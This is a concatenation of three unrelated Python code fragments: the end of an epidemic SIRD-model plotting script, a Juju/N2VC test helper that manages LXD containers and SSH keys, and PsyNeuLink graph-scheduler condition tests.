print(np.argmax(Inew_u[: -(p.numeric_max_age + p.extra_days_to_simulate)]))
print('Total deaths and recoveries with 2-DF:')
print([np.sum(D_u),np.sum(R_u)])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_u,2),round(min(R_eff_u),2),round(max(R_eff_u),2), np.where(R_eff_u<1)[0][0], np.argmax(Inew_u[: -(p.numeric_max_age + p.extra_days_to_simulate)])])
if FitAge:
print('------ Best SItRD parameters:------ ')
print(parameters[0])
print('Std Dev:')
print(-scores[0])
print('Total deaths and recoveries with 2-DF:')
print([np.sum(D_a),R_a[-1]])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_a,2),round(min(R_eff_a),2),round(max(R_eff_a),2), np.where(R_eff_a<1)[0][0], np.argmax(Iday_a[0,: -(p.numeric_max_age + p.extra_days_to_simulate)])])
# figure with R_eff
print('Ploting ...')
# xticks:
Feb15 = datetime.strptime("15-02-2020", "%d-%m-%Y").date()
date_list = [Feb15 + timedelta(days=x) for x in range(maxtime_fit+1)]
# time
t = np.linspace(0, maxtime_fit-1, maxtime_fit)
fig, (ax2, ax, ax4) = plt.subplots(3, 1, figsize=(8.0, 5.5))
ax.plot(t, Iday_a[0,:maxtime_fit], label = Model2_label)
ax.plot(t, Inew_s[:maxtime_fit], label='SIRD')
ax.plot(t, Inew_sD[:maxtime_fit], label=r'SIRD-\Delta D')
ax.plot(t, Inew_u[:maxtime_fit], label='SIURD')
ax.legend()
ax.set_title('Daily new infections')
ax.set_ylabel('Number')
ax.set_xticks([x for x in (0, 80, 160, 240) if x < len(date_list)])
ax.grid(True)
plt.setp(ax.get_xticklabels(), visible=False)
ax2.plot(t[p.day_1st_death_after_150220:], data_D[p.day_1st_death_after_150220:maxtime_fit],'b.', label = 'Synt data')
ax2.plot(t, D_a[:maxtime_fit], label = Model2_label)
ax2.plot(t, D_s[:maxtime_fit], label='SIRD')
ax2.plot(t, D_sD[:maxtime_fit], label=r'SIRD-\Delta D')
ax2.plot(t, D_u[:maxtime_fit], label='SIURD')
ax2.legend()
ax2.set_title('Daily deaths')
ax2.set_ylabel('Number')
ax2.set_xticks([x for x in (0, 80, 160, 240) if x < len(date_list)])
ax2.grid(True)
plt.setp(ax2.get_xticklabels(), visible=False)
ax4.plot(R_eff_a[:maxtime_fit] , label = Model2_label + ' R_0 = ' + str( round(R_0_a, 2)))
ax4.plot(R_eff_s[:maxtime_fit], label = 'SIRD R_0 | |
<filename>tests/base.py
#!/usr/bin/env python3
# Copyright 2019 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import datetime
import logging
import n2vc.vnf
import pylxd
import pytest
import os
import shlex
import subprocess
import time
import uuid
import yaml
from juju.controller import Controller
# Disable InsecureRequestWarning w/LXD
import urllib3
urllib3.disable_warnings()
logging.getLogger("urllib3").setLevel(logging.WARNING)
here = os.path.dirname(os.path.realpath(__file__))
class CleanController():
"""
Context manager that automatically connects and disconnects from
the currently active controller.
Note: Unlike CleanModel, this will not create a new controller for you,
and an active controller must already be available.
"""
def __init__(self):
self._controller = None
async def __aenter__(self):
self._controller = Controller()
await self._controller.connect()
return self._controller
async def __aexit__(self, exc_type, exc, tb):
await self._controller.disconnect()
def debug(msg):
"""Format debug messages in a consistent way."""
now = datetime.datetime.now()
# TODO: Decide on the best way to log. Output from `logging.debug` shows up
# when a test fails, but print() will always show up when running tox with
# `-s`, which is really useful for debugging single tests without having to
# insert a False assert to see the log.
logging.debug(
"[{}] {}".format(now.strftime('%Y-%m-%dT%H:%M:%S'), msg)
)
print(
"[{}] {}".format(now.strftime('%Y-%m-%dT%H:%M:%S'), msg)
)
def get_charm_path():
return "{}/charms".format(here)
def get_layer_path():
return "{}/charms/layers".format(here)
def collect_metrics(application):
"""Invoke Juju's metrics collector.
Caveat: this shells out to the `juju collect-metrics` command, rather than
making an API call. At the time of writing, that API is not exposed through
the client library.
"""
try:
subprocess.check_call(['juju', 'collect-metrics', application])
except subprocess.CalledProcessError as e:
raise Exception("Unable to collect metrics: {}".format(e))
def has_metrics(charm):
"""Check if a charm has metrics defined."""
metricsyaml = "{}/{}/metrics.yaml".format(
get_layer_path(),
charm,
)
if os.path.exists(metricsyaml):
return True
return False
def get_descriptor(descriptor):
desc = None
try:
tmp = yaml.safe_load(descriptor)
# Remove the envelope
root = list(tmp.keys())[0]
if root == "nsd:nsd-catalog":
desc = tmp['nsd:nsd-catalog']['nsd'][0]
elif root == "vnfd:vnfd-catalog":
desc = tmp['vnfd:vnfd-catalog']['vnfd'][0]
except ValueError:
assert False
return desc
def get_n2vc(loop=None):
"""Return an instance of N2VC.VNF."""
log = logging.getLogger()
log.level = logging.DEBUG
# Extract parameters from the environment in order to run our test
vca_host = os.getenv('VCA_HOST', '127.0.0.1')
vca_port = os.getenv('VCA_PORT', 17070)
vca_user = os.getenv('VCA_USER', 'admin')
vca_charms = os.getenv('VCA_CHARMS', None)
vca_secret = os.getenv('VCA_SECRET', None)
vca_cacert = os.getenv('VCA_CACERT', None)
# Get the Juju Public key
juju_public_key = get_juju_public_key()
if juju_public_key:
debug("Reading Juju public key @ {}".format(juju_public_key))
with open(juju_public_key, 'r') as f:
juju_public_key = f.read()
debug("Found public key: {}".format(juju_public_key))
else:
raise Exception("No Juju Public Key found")
# Get the ca-cert
# os.path.expanduser("~/.config/lxc")
# with open("{}/agent.conf".format(AGENT_PATH), "r") as f:
# try:
# y = yaml.safe_load(f)
# self.cacert = y['cacert']
# except yaml.YAMLError as exc:
# log("Unable to find Juju ca-cert.")
# raise exc
client = n2vc.vnf.N2VC(
log=log,
server=vca_host,
port=vca_port,
user=vca_user,
secret=vca_secret,
artifacts=vca_charms,
loop=loop,
juju_public_key=juju_public_key,
ca_cert=vca_cacert,
)
return client
def create_lxd_container(public_key=None, name="test_name"):
"""
Returns a container object
If public_key isn't set, we'll use the Juju ssh key
:param public_key: The public key to inject into the container
:param name: The name of the test being run
"""
container = None
# Format name so it's valid
name = name.replace("_", "-").replace(".", "")
client = get_lxd_client()
if not client:
raise Exception("Unable to connect to LXD")
test_machine = "test-{}-{}".format(
uuid.uuid4().hex[-4:],
name,
)
private_key_path, public_key_path = find_n2vc_ssh_keys()
try:
# create profile w/cloud-init and juju ssh key
if not public_key:
public_key = ""
with open(public_key_path, "r") as f:
public_key = f.readline()
client.profiles.create(
test_machine,
config={
'user.user-data': '#cloud-config\nssh_authorized_keys:\n- {}'.format(public_key)},
devices={
'root': {'path': '/', 'pool': 'default', 'type': 'disk'},
'eth0': {
'nictype': 'bridged',
'parent': 'lxdbr0',
'type': 'nic'
}
}
)
except Exception as ex:
debug("Error creating lxd profile {}: {}".format(test_machine, ex))
raise ex
try:
# create lxc machine
config = {
'name': test_machine,
'source': {
'type': 'image',
'alias': 'xenial',
'mode': 'pull',
'protocol': 'simplestreams',
'server': 'https://cloud-images.ubuntu.com/releases',
},
'profiles': [test_machine],
}
container = client.containers.create(config, wait=True)
container.start(wait=True)
except Exception as ex:
debug("Error creating lxd container {}: {}".format(test_machine, ex))
# This is a test-ending failure.
raise ex
def wait_for_network(container, timeout=30):
"""Wait for eth0 to have an ipv4 address."""
starttime = time.time()
while(time.time() < starttime + timeout):
time.sleep(1)
if 'eth0' in container.state().network:
addresses = container.state().network['eth0']['addresses']
if len(addresses) > 0:
if addresses[0]['family'] == 'inet':
return addresses[0]
return None
try:
wait_for_network(container)
except Exception as ex:
debug(
"Error waiting for container {} network: {}".format(
test_machine,
ex,
)
)
try:
waitcount = 0
while waitcount <= 5:
if is_sshd_running(container):
break
waitcount += 1
time.sleep(1)
if waitcount >= 5:
debug("couldn't detect sshd running")
raise Exception("Unable to verify container sshd")
except Exception as ex:
debug(
"Error checking sshd status on {}: {}".format(
test_machine,
ex,
)
)
# HACK: We need to give sshd a chance to bind to the interface,
# and pylxd's container.execute seems to be broken and fails and/or
# hangs trying to properly check if the service is up.
(exit_code, stdout, stderr) = container.execute([
'ping',
'-c', '5', # Wait for 5 ECHO_REPLY
'8.8.8.8', # Ping Google's public DNS
'-W', '15', # Set a 15 second deadline
])
if exit_code > 0:
# The network failed
raise Exception("Unable to verify container network")
return container
def is_sshd_running(container):
"""Check if sshd is running in the container.
Check to see if the sshd process is running and listening on port 22.
:param container: The container to check
:return boolean: True if sshd is running.
"""
debug("Container: {}".format(container))
try:
(rc, stdout, stderr) = container.execute(
["service", "ssh", "status"]
)
# If the status is a) found and b) running, the exit code will be 0
if rc == 0:
return True
except Exception as ex:
debug("Failed to check sshd service status: {}".format(ex))
return False
def destroy_lxd_container(container):
"""Stop and delete a LXD container.
Sometimes we see errors talking to LXD -- ephemerial issues like
load or a bug that's killed the API. We'll do our best to clean
up here, and we should run a cleanup after all tests are finished
to remove any extra containers and profiles belonging to us.
"""
if type(container) is bool:
return
name = container.name
debug("Destroying container {}".format(name))
client = get_lxd_client()
def wait_for_stop(timeout=30):
"""Wait for eth0 to have an ipv4 address."""
starttime = time.time()
while(time.time() < starttime + timeout):
time.sleep(1)
if container.state == "Stopped":
return
def wait_for_delete(timeout=30):
starttime = time.time()
while(time.time() < starttime + timeout):
time.sleep(1)
if client.containers.exists(name) is False:
return
try:
container.stop(wait=False)
wait_for_stop()
except Exception as ex:
debug(
"Error stopping container {}: {}".format(
name,
ex,
)
)
try:
container.delete(wait=False)
wait_for_delete()
except Exception as ex:
debug(
"Error deleting container {}: {}".format(
name,
ex,
)
)
try:
# Delete the profile created for this container
profile = client.profiles.get(name)
if profile:
profile.delete()
except Exception as ex:
debug(
"Error deleting profile {}: {}".format(
name,
ex,
)
)
def find_lxd_config():
"""Find the LXD configuration directory."""
paths = []
paths.append(os.path.expanduser("~/.config/lxc"))
paths.append(os.path.expanduser("~/snap/lxd/current/.config/lxc"))
for path in paths:
if os.path.exists(path):
crt = os.path.expanduser("{}/client.crt".format(path))
key = os.path.expanduser("{}/client.key".format(path))
if os.path.exists(crt) and os.path.exists(key):
return (crt, key)
return (None, None)
def find_n2vc_ssh_keys():
"""Find the N2VC ssh keys."""
paths = []
paths.append(os.path.expanduser("~/.ssh/"))
for path in paths:
if os.path.exists(path):
private = os.path.expanduser("{}/id_n2vc_rsa".format(path))
public = os.path.expanduser("{}/id_n2vc_rsa.pub".format(path))
if os.path.exists(private) and os.path.exists(public):
return (private, public)
return (None, None)
def find_juju_ssh_keys():
"""Find the Juju ssh keys."""
paths = []
paths.append(os.path.expanduser("~/.local/share/juju/ssh"))
for path in paths:
if os.path.exists(path):
private = os.path.expanduser("{}/juju_id_rsa".format(path))
public = os.path.expanduser("{}/juju_id_rsa.pub".format(path))
if os.path.exists(private) and os.path.exists(public):
return (private, public)
return (None, None)
def get_juju_private_key():
keys = find_juju_ssh_keys()
return keys[0]
def get_juju_public_key():
"""Find the Juju public key."""
paths = []
if 'VCA_PATH' in os.environ:
paths.append("{}/ssh".format(os.environ["VCA_PATH"]))
paths.append(os.path.expanduser("~/.local/share/juju/ssh"))
paths.append("/root/.local/share/juju/ssh")
for path in paths:
if os.path.exists(path):
public = os.path.expanduser("{}/juju_id_rsa.pub".format(path))
if os.path.exists(public):
return public
return None
def get_lxd_client(host=None, port="8443", verify=False):
""" Get the LXD client."""
if host is None:
if 'LXD_HOST' in os.environ:
host = os.environ['LXD_HOST']
else:
host = '127.0.0.1'
passwd = None
if 'LXD_SECRET' in os.environ:
passwd = os.environ['LXD_SECRET']
# debug("Connecting to LXD remote {} w/authentication ({})".format(
# host,
| |
<reponame>kmantel/graph-scheduler
import logging
import graph_scheduler
import pytest
from psyneulink import _unit_registry
from psyneulink.core.components.functions.nonstateful.transferfunctions import Linear
from psyneulink.core.components.mechanisms.processing.transfermechanism import TransferMechanism
from psyneulink.core.components.projections.pathway.mappingprojection import MappingProjection
from psyneulink.core.compositions.composition import Composition
from psyneulink.core.scheduling.condition import (
AfterCall, AfterNCalls, AfterNCallsCombined, AfterNPasses, AfterNEnvironmentStateUpdates,
AfterPass, AfterEnvironmentStateUpdate, All, AllHaveRun, Always, Any, AtPass, AtConsiderationSetExecution,
AtEnvironmentStateUpdate, AtEnvironmentStateUpdateStart, BeforeNCalls, BeforePass, BeforeConsiderationSetExecution,
BeforeEnvironmentStateUpdate, Condition, ConditionError, EveryNCalls, EveryNPasses, Not,
NWhen, TimeInterval, TimeTermination, WhenFinished, WhenFinishedAll,
WhenFinishedAny, WhileNot,
)
from psyneulink.core.scheduling.scheduler import Scheduler
from psyneulink.core.scheduling.time import TimeScale
logger = logging.getLogger(__name__)
class TestCondition:
def test_invalid_input_WhenFinished(self):
with pytest.raises(ConditionError):
WhenFinished(None).is_satisfied()
def test_invalid_input_WhenFinishedAny_1(self):
with pytest.raises(ConditionError):
WhenFinished(None).is_satisfied()
def test_invalid_input_WhenFinishedAny_2(self):
with pytest.raises(ConditionError):
WhenFinished({None}).is_satisfied()
def test_invalid_input_WhenFinishedAll_1(self):
with pytest.raises(ConditionError):
WhenFinished(None).is_satisfied()
def test_invalid_input_WhenFinishedAll_2(self):
with pytest.raises(ConditionError):
WhenFinished({None}).is_satisfied()
def test_additional_args(self):
class OneSatisfied(Condition):
def __init__(self, a):
def func(a, b):
return a or b
super().__init__(func, a)
cond = OneSatisfied(True)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False)
cond = OneSatisfied(False)
assert cond.is_satisfied(True)
assert not cond.is_satisfied(False)
def test_additional_kwargs(self):
class OneSatisfied(Condition):
def __init__(self, a, c=True):
def func(a, b, c=True):
return a or b or c
super().__init__(func, a, c=True)
cond = OneSatisfied(True)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False, c=True)
assert cond.is_satisfied(False, c=False)
cond = OneSatisfied(True, c=False)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False, c=True)
assert cond.is_satisfied(False, c=False)
cond = OneSatisfied(False)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False, c=True)
assert not cond.is_satisfied(False, c=False)
assert not cond.is_satisfied(False, c=False, extra_arg=True)
@pytest.mark.psyneulink
class TestGeneric:
def test_WhileNot_AtPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, WhileNot(lambda sched: sched.get_clock(sched.default_execution_id).get_total_times_relative(TimeScale.PASS, TimeScale.ENVIRONMENT_STATE_UPDATE) == 0, sched))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_WhileNot_AtPass_in_middle(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, WhileNot(lambda sched: sched.get_clock(sched.default_execution_id).get_total_times_relative(TimeScale.PASS, TimeScale.ENVIRONMENT_STATE_UPDATE) == 2, sched))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.psyneulink
class TestRelative:
def test_Any_end_before_one_finished(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
for m in [A]:
comp.add_node(m)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, EveryNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = Any(AfterNCalls(A, 10), AtPass(5))
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A for _ in range(5)]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_All_end_after_one_finished(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
for m in [A]:
comp.add_node(m)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, EveryNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = Any(AfterNCalls(A, 5), AtPass(10))
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A for _ in range(5)]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_Not_AtPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Not(AtPass(0)))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_Not_AtPass_in_middle(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Not(AtPass(2)))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.parametrize(
'n,expected_output', [
(0, ['A', 'A', 'A', 'A', 'A', 'A']),
(1, ['A', 'A', 'A', 'B', 'A', 'A', 'A']),
(2, ['A', 'A', 'A', 'B', 'A', 'B', 'A', 'A']),
]
)
def test_NWhen_AfterNCalls(self, n, expected_output):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
B = TransferMechanism(function=Linear(intercept=4.0), name='B')
for m in [A, B]:
comp.add_node(m)
comp.add_projection(MappingProjection(), A, B)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Always())
sched.add_condition(B, NWhen(AfterNCalls(A, 3), n))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AfterNCalls(A, 6)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A if x == 'A' else B for x in expected_output]
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.psyneulink
class TestTimePNL:
def test_BeforeConsiderationSetExecution(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforeConsiderationSetExecution(2))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_BeforeConsiderationSetExecution_2(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
B = TransferMechanism(name='B')
comp.add_node(A)
comp.add_node(B)
comp.add_projection(MappingProjection(), A, B)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforeConsiderationSetExecution(2))
sched.add_condition(B, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, B, B, B, B, B]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtConsiderationSetExecution(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtConsiderationSetExecution(0))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_BeforePass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforePass(2))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(0))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_underconstrained(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
B = TransferMechanism(function=Linear(intercept=4.0), name='B')
C = TransferMechanism(function=Linear(intercept=1.5), name='C')
for m in [A, B, C]:
comp.add_node(m)
comp.add_projection(MappingProjection(), A, B)
comp.add_projection(MappingProjection(), B, C)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(0))
sched.add_condition(B, Always())
sched.add_condition(C, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AfterNCalls(C, 2)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, B, C, B, C]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_in_middle(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(2))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), set(), A, set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_at_end(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(5))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_after_end(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(6))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AfterPass(0))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterNPasses(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AfterNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_BeforeEnvironmentStateUpdate(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforeEnvironmentStateUpdate(4))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(5)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(1)
comp.run(
inputs={A: range(6)},
scheduler=sched,
termination_processing=termination_conds
)
output = sched.execution_list[comp.default_execution_id]
expected_output = [A, A, A, A, set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtEnvironmentStateUpdate(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AtEnvironmentStateUpdate(4)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(1)
comp.run(
inputs={A: range(6)},
scheduler=sched,
termination_processing=termination_conds
)
output = sched.execution_list[comp.default_execution_id]
expected_output = [A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterEnvironmentStateUpdate(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterEnvironmentStateUpdate(4)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(1)
comp.run(
inputs={A: range(6)},
scheduler=sched,
termination_processing=termination_conds
)
output = sched.execution_list[comp.default_execution_id]
expected_output = [A, A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterNEnvironmentStateUpdates(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AfterNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
class TestTime:
@pytest.mark.parametrize(
'node_condition, termination_conditions, expected_output',
[
pytest.param(
graph_scheduler.AfterNPasses(1),
{
TimeScale.ENVIRONMENT_SEQUENCE: graph_scheduler.AfterNEnvironmentStateUpdates(1),
TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterConsiderationSetExecution(4)
},
[set(), 'A', 'A', 'A', 'A'],
id='AfterConsiderationSetExecution'
),
pytest.param(
graph_scheduler.AfterNPasses(1),
{
TimeScale.ENVIRONMENT_SEQUENCE: graph_scheduler.AfterNEnvironmentStateUpdates(1),
TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNConsiderationSetExecutions(5)
},
[set(), 'A', 'A', 'A', 'A'],
id='AfterNConsiderationSetExecutions'
),
]
)
def test_single_node(
self, node_condition, termination_conditions, expected_output
):
graph = {'A': set()}
